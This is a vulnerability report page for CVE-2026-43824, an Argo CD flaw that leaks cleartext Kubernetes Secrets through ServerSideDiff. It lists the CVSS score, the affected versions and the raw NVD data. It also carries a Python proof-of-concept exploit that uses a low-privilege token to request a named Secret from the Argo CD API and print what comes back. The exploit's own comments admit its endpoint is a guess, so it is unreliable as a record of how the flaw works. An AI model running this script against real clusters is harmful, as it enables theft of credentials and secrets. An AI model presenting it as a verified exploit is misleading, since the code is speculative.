Security Vulnerability Report
中文
CVE-2026-43824 CVSS 7.7 HIGH

CVE-2026-43824

Published: 2026-05-02 02:16:01
Last Modified: 2026-05-05 19:47:31

Description

In Argo CD 3.2.0 before 3.2.11 and 3.3.0 before 3.3.9, ServerSideDiff allows reading cleartext Kubernetes Secret data.

CVSS Details

CVSS Score
7.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Argo CD 3.2.0 - 3.2.10
Argo CD 3.3.0 - 3.3.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import base64 # Exploit Title: Argo CD ServerSideDiff Secret Disclosure (CVE-2026-43824) # Description: PoC to demonstrate reading cleartext secrets via ServerSideDiff API def exploit_argocd_secret_leak(target_url, auth_token, app_name, resource_name): """ Attempts to trigger a ServerSideDiff to leak secrets. """ headers = { "Authorization": f"Bearer {auth_token}", "Content-Type": "application/json" } # Endpoint to trigger the diff or get resource details which might leak secrets # specific endpoint depends on API version, typically /api/v1/applications/{name}/resource/diff endpoint = f"{target_url}/api/v1/applications/{app_name}/resource" # Payload targeting a Kubernetes Secret payload = { "kind": "Secret", "name": resource_name, "namespace": "default" # Adjust as needed } try: print(f"[*] Attempting to read Secret: {resource_name} via Diff logic...") # In a real scenario, the specific endpoint causing the leak might be the diff endpoint # that returns the live state including the secret data. response = requests.post(endpoint, json=payload, headers=headers, verify=False) if response.status_code == 200: data = response.json() # Check if secret data is exposed in the response if 'data' in data or 'manifest' in data: print("[+] Potential secret data found in response:") print(data) else: print("[-] Secret not directly exposed in standard manifest view, try diff endpoint.") else: print(f"[!] Request failed with status code: {response.status_code}") print(response.text) except Exception as e: print(f"[!] Error: {e}") if __name__ == "__main__": # Example usage TARGET = "https://argocd.example.com" TOKEN = "<YOUR_LOW_PRIV_TOKEN>" APP = "guestbook" # An application the user has access to RESOURCE = "db-secret" exploit_argocd_secret_leak(TARGET, TOKEN, APP, RESOURCE)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-43824", "sourceIdentifier": "[email protected]", "published": "2026-05-02T02:16:00.747", "lastModified": "2026-05-05T19:47:31.297", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Argo CD 3.2.0 before 3.2.11 and 3.3.0 before 3.3.9, ServerSideDiff allows reading cleartext Kubernetes Secret data."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-212"}]}], "references": [{"url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-3v3m-wc6v-x4x3", "source": "[email protected]"}, {"url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-3v3m-wc6v-x4x3", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}